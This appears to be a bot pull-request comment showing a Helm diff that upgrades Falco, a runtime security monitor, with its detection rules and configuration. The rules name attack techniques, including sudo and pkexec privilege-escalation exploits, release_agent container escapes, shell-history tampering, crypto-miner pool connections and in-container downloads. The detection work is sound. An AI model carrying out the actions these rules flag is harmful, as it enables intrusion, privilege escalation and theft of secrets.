+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
      desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). By executing sudoedit -s or sudoedit -i with a command-line argument that ends with a single backslash character, an unprivileged user can elevate privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify custom conditions under
+    # which the use of ingress remote file copy tools in containers is expected.
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    - macro: curl_download
+      condition: proc.name = curl and
+                 (proc.cmdline contains " -o " or
+                 proc.cmdline contains " --output " or
+                 proc.cmdline contains " -O " or
+                 proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detects an attempt to exploit a container escape using the release_agent file. By running a container with certain capabilities, a privileged user can modify the release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64,
+        k8s.gcr.io/prometheus-to-sd
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
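
Both `falco_hostpid_images` and `falco_hostipc_images` ship empty, so any pod requesting the host pid or ipc namespace alerts by default. A hedged sketch of a local exception, assuming the `append` list syntax and a hypothetical monitoring agent image:

```yaml
# falco_rules.local.yaml -- exempt a known agent from the HostPid Pod rule
- list: falco_hostpid_images
  append: true
  items: [docker.io/example/node-agent]  # hypothetical image repository
```
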
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         k8s.gcr.io/addon-resizer,
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule: K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
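
These two rules fire on every secret read, which can be noisy in clusters where controllers fetch secrets routinely. Falco lets a later rules file override a rule by name, so (assuming that override behavior in this version) a local opt-out could look like:

```yaml
# falco_rules.local.yaml -- silence the successful-get rule if too noisy
- rule: K8s Secret Get Successfully
  enabled: false
```
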
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
     # cluster creation. This may signify a permission setting that is too broad.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 4b97125a888a5b4a68854280134e118109f4db0a8209813eb2edd9b82fbe7b0e
+        checksum/rules: 321342874a2d2084ca1255e7c0d5a51be6ab8f857123cdd1158916436a165074
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.2 chore(deps): update helm release falco to v1.19.3 Jun 14, 2022
@github-actions
Contributor

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.3

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. 
This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. 
\"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. 
